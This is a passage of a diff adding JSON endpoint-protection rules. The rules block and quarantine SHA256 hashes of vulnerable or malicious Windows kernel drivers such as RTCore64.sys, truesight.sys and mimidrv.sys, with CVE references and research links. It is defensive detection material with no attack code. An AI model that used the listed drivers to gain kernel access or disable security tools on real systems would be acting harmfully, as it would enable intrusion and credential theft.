+ "creation_date": "2026-03-23T11:45:29.619213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619219Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ed3379d7ac1ad8bcfd13cd2502420569088ee7f1e04522ada48481d9a545a08",
+ "comment": "Super Micro Computer physmem tool (aka phymem64.sys) [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63504905-0cb0-59d0-8c7f-8ef86d80c487",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614980Z",
+ "creation_date": "2026-03-23T11:45:29.614982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614987Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "635c9606-ff46-561a-86d8-6d739d55845d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154822Z",
+ "creation_date": "2026-03-23T11:45:31.154824Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154829Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5ef7639538292747b22596c39e69ea93d4e22fa88c61c7d40a297f3f5bf583b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6364052a-f4cb-553b-b50a-16b4b53f2ba6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481486Z",
+ "creation_date": "2026-03-23T11:45:31.481490Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481501Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2662c1709399ffd679f23a71fc51ceae58948add2f5bb6f61550f348211d54ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63689efd-74b9-5d34-9dbf-4e2cf876b2d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159827Z",
+ "creation_date": "2026-03-23T11:45:31.159829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159835Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d8119e6113e7959f975cb880c93f6a684f465811c4a250a43ad0b6bba88d9e0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "636a702b-ae92-539b-a49b-65b37bdeb960",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817574Z",
+ "creation_date": "2026-03-23T11:45:30.817576Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0584520b4b3bdad1d177329bd9952c0589b2a99eb9676cb324d1fce46dad0b9a",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "636ce957-5f13-5d12-9809-2ef587b0a43a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488569Z",
+ "creation_date": "2026-03-23T11:45:31.488571Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488577Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9c3d1f24b6d9f8bc53e7fec105ace9ce71e934ad84b79ab72c96364131b575d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6370e251-bd39-5a56-a901-566e908e40ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479172Z",
+ "creation_date": "2026-03-23T11:45:31.479176Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479186Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2cccda46ceddaa78ce1cb5a5fa2e0ff6d83a6f1f7fe8d1c26eff2a0cd539cf92",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "637bd7f1-a372-5468-b23d-6cf9b9c61705",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618477Z",
+ "creation_date": "2026-03-23T11:45:29.618479Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618485Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c8cb72b9a011b60b1b9caea508b26fbbd95a1e3634af66082417381fe6544fb",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "637e8c32-1166-5bf9-8645-a58a5bdeea7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820081Z",
+ "creation_date": "2026-03-23T11:45:31.820085Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820094Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a55279e70f331ddbdb8d52f9b1e3af5a3462c589966283b9754cfe09821cb538",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "637f4dff-c6a6-5186-ad34-4189d9d80aa6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471379Z",
+ "creation_date": "2026-03-23T11:45:30.471382Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471392Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "21e6d9229f380d5e9591beaa82bd93547f517af90707d7757f0e27ff4731b484",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/fbdd993b-47b1-4448-8c41-24c310802398/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63933b68-cd81-5626-beb1-1b23ff70e5ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971655Z",
+ "creation_date": "2026-03-23T11:45:29.971658Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971666Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a166e70dcaf3ef12836db1927953ee528e532cdae8165e67d776971e4cbc48c",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63954bab-0515-52c2-8fe6-28ee216a9c6e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143892Z",
+ "creation_date": "2026-03-23T11:45:31.143894Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143899Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bca0038cf1d952db22d8b201dec2e4c4eeeceff4b0cbb9d81974027ae4646fa2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "639fd72f-6e56-5797-9854-c2b1ecf5a44f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607491Z",
+ "creation_date": "2026-03-23T11:45:29.607493Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607498Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1766fd66f846d9a21e648d649ad35d1ff94f8ca17a40a9a738444d6b8e07aacb",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63ba3797-dfad-5f76-a4b9-06fb1238c48c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980081Z",
+ "creation_date": "2026-03-23T11:45:29.980083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980088Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a720c9a95ab33b29c19fc37fed2b4d2079a2e4b9bd861d406043bd6010fc4d71",
+ "comment": "Malicious Kernel Driver (aka mJj0ge.sys) [https://www.loldrivers.io/drivers/412f4aaf-5525-458c-b87e-311e504b856d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63c91180-20ca-5c75-a622-0b2273810e91",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827179Z",
+ "creation_date": "2026-03-23T11:45:30.827181Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827187Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "582b5a3d15aaed4d078c45b9ecd7812d5df987cda6de4c7e9fd9bc31c066679d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63df8fa9-a7eb-5351-8f05-29de8568b1b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465141Z",
+ "creation_date": "2026-03-23T11:45:30.465145Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465153Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2486f9359c94d7473ad8331b87a9c17ca9ba6e4109fd26ce92dff01969eaa09",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63e2c42f-9db3-5a3c-a30f-d7511543b152",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974000Z",
+ "creation_date": "2026-03-23T11:45:29.974002Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974007Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d783ace822f8fe4e25d5387e5dd249cb72e62f62079023216dc436f1853a150f",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63e9c232-f698-5369-8865-0c034890a840",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481583Z",
+ "creation_date": "2026-03-23T11:45:31.481587Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481597Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f0f87e224d93bcee82e751f24912a8000e9e650b4a5e34cd4516433d3b498736",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63eaa8d7-a42f-5ba6-9d40-c97f6d254deb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465001Z",
+ "creation_date": "2026-03-23T11:45:30.465004Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465013Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "083f821d90e607ed93221e71d4742673e74f573d0755a96ad17d1403f65a2254",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63ed6003-d2d9-5761-b2b3-37cd16fc0bd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983050Z",
+ "creation_date": "2026-03-23T11:45:29.983052Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983058Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36861bb32abd5ba7955aa69269d27772f75d0306485d10ed045125816422c423",
+ "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63ee4378-cab2-54b6-8d2c-a992824b9fd0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823659Z",
+ "creation_date": "2026-03-23T11:45:31.823661Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a7f423e5a686a7114cfb5cf6a6070064fafd11cbc2337000c8c14c1f33ba256",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "63ff631e-12b7-56ce-be8f-042c3d867eca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149563Z",
+ "creation_date": "2026-03-23T11:45:31.149567Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149576Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
